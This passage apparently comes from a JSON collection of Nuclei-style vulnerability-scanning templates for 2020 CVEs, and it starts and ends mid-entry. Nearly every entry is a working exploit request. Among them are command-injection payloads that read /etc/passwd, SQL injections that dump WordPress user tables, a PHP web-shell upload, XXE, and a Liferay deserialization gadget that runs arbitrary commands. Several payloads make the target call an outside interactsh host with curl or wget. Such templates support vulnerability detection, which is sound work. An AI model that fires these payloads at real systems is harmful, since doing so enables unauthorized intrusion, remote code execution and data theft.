application/x-www-form-urlencoded\n\nX-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4468-0202-EVC"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"csrf","internal":true,"xpath":["/html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input"],"attribute":"value","part":"body"}]}]},{"id":"CVE-2020-15148","info":{"name":"Yii 2 < 2.0.38 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="],"matchers-condition":"and","matchers":[{"type":"word","words":["total","An internal server error occurred."],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-2733","info":{"name":"JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/fileDownloader?sec=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ACHCJK"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35986","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-8515","info":{"name":"DrayTek - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11854","info":{"name":"Micro Focus UCMDB - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2140","info":{"name":"Jenkin Audit Trail <=3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample","{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>sample"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6171","info":{"name":"CLink Office 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9036","info":{"name":"Jeedom <=4.0.38 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>document.title = \"\";alert(document.domain);\" - Jeedom\"</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10548","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16952","info":{"name":"Microsoft SharePoint - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["15\\.0\\.0\\.(4571|5275|4351|5056)","16\\.0\\.0\\.(10337|10364|10366)"],"condition":"or"},{"type":"regex","part":"header","regex":["(?i)(Microsoftsharepointteamservices:)"]},{"type":"status","status":[200,201],"condition":"or"}]}]},{"id":"CVE-2020-22211","info":{"name":"74cms - ajax_street.php 'key' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-26153","info":{"name":"Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"/></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-15500","info":{"name":"TileServer GL <=3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["'>\"<svg/onload=confirm('xss')>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24903","info":{"name":"Cute Editor for ASP.NET 6.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script></p>","System.Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28871","info":{"name":"Monitorr 1.7.6m - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: text/plain, */*; q=0.01\nConnection: close\nAccept-Language: en-US,en;q=0.5\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745\nOrigin: http://{{Hostname}}\nReferer: http://{{Hostname}}\n\n-----------------------------31046105003900160576454225745\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.php\"\nContent-Type: image/gif\n\nGIF89a213213123<?php echo md5('CVE-2020-28871');unlink(__FILE__); ?>\n\n-----------------------------31046105003900160576454225745--\n","GET /assets/data/usrimg/{{tolower(\"{{randstr}}.php\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["d03c180355b797069cc047ff5606d689"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24312","info":{"name":"WordPress Plugin File Manager (wp-file-manager) Backup Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of","wp-content/uploads/wp-file-manager-pro/fm_backup","backup_"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23575","info":{"name":"Kyocera Printer d-COPIA253MF - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root:.*:0:0:","bin:.*:1:1"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13405","info":{"name":"Microweber <1.1.20 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:modules/load_module:users\n\nmodule={{endpoint}}\n"],"payloads":{"endpoint":["users/controller","modules/users/controller","/modules/users/controller"]},"matchers":[{"type":"dsl","dsl":["contains(body,\"username\")","contains(body,\"password\")","contains(body,\"password_reset_hash\")","status_code==200","contains(header,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-27735","info":{"name":"Wing FTP 6.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frame name=\"hmcontent\" src=\"javascript:alert(document.domain)\" title=\"Content frame\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14181","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ViewUserHover.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["user-hover-details","content=\"JIRA\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7980","info":{"name":"Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/libagent.cgi?type=J HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nCookie: ctr_t=0; sid=123456789\n\n{\"O_\": \"A\", \"F_\": \"EXEC_CMD\", \"S_\": 123456789, \"P1_\": {\"Q\": \"cat /etc/passwd\", \"F\": \"EXEC_CMD\"}, \"V_\": 1}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1956","info":{"name":"Apache Kylin 3.0.1 - Command Injection Vulnerability","severity":"high"},"requests":[{"raw":["POST /kylin/api/user/authentication HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n","POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-20285","info":{"name":"ZZcms - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /user/login.php HTTP/1.1\nHost: {{Hostname}}\nReferer: xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fromurl\" type=\"hidden\" value=\"xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24589","info":{"name":"WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npayload=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+\"http%3a//{{interactsh-url}}\">%25xxe%3b]>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Failed to install the generic artifact type"]}]}]},{"id":"CVE-2020-14408","info":{"name":"Agentejo Cockpit 0.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["redirectTo = '/92874';alert(document.domain)//280';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13700","info":{"name":"WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["acf-to-rest-api\\/class-acf-to-rest-api.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28188","info":{"name":"TerraMaster TOS - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-1943","info":{"name":"Apache OFBiz <=16.11.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/control/stream?contentId=%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5775","info":{"name":"Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-14144","info":{"name":"Gitea 1.1.0 - 1.12.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["Gitea:"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-16139","info":{"name":"Cisco Unified IP Conference Station 7937G - Denial-of-Service","severity":"high"},"requests":[{"raw":["POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","words":["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36112","info":{"name":"CSE Bookstore 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["get book price failed! You have an error in your SQL syntax","Can't retrieve data You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2020-17463","info":{"name":"Fuel CMS 1.4.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\n\nuser_name={{username}}&password={{password}}&Login=Login&forward=\n","@timeout: 10s\nGET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_3 == 200","contains(body_1, \"FUEL CMS\")"],"condition":"and"}]}]},{"id":"CVE-2020-9344","info":{"name":"Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test","{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","jira","subversion"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15895","info":{"name":"D-Link DIR-816L 2.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[";alert(document.domain);","DIR-816L"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20982","info":{"name":"shadoweb wdja v1.5.1 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["location.href='</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24902","info":{"name":"Quixplorer <=2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&srt=yes","My Download"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14092","info":{"name":"WordPress PayPal Pro <1.1.65 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"user_login\"","\"user_email\"","\"user_pass\"","\"user_activation_key\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-0618","info":{"name":"Microsoft SQL Server Reporting Services - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ReportServer/Pages/ReportViewer.aspx"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view report"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25223","info":{"name":"Sophos UTM Preauth - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /var HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, text/html, application/xml, text/xml, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nX-Prototype-Version: 1.5.1.1\nContent-Type: application/json; charset=UTF-8\nOrigin: {{BaseURL}}\nConnection: close\nReferer: {{BaseURL}}\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"objs\": [{\"FID\": \"init\"}], \"SID\": \"|wget http://{{interactsh-url}}|\", \"browser\": \"gecko_linux\", \"backend_version\": -1, \"loc\": \"\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1629210675639_0.5000855117488202\", \"current_uuid\": \"\", \"ipv6\": true}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-8191","info":{"name":"Citrix ADC/Gateway - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /menu/stapp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-NITRO-USER: xpyZxwy6\n\nsid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</title><script>alert(31337)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7961","info":{"name":"Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/jsonws/invoke HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData\ncmd2: {{command}}\n\ncmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D\n"],"payloads":{"command":["systeminfo","lsb_release -a"]},"matchers-condition":"and","matchers":[{"type":"regex","regex":["OS Name:.*Microsoft Windows","Distributor ID:"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Microsoft Windows (.*)","Distributor ID: (.*)"],"part":"body"}]}]},{"id":"CVE-2020-35598","info":{"name":"Advanced Comment System 1.0 - 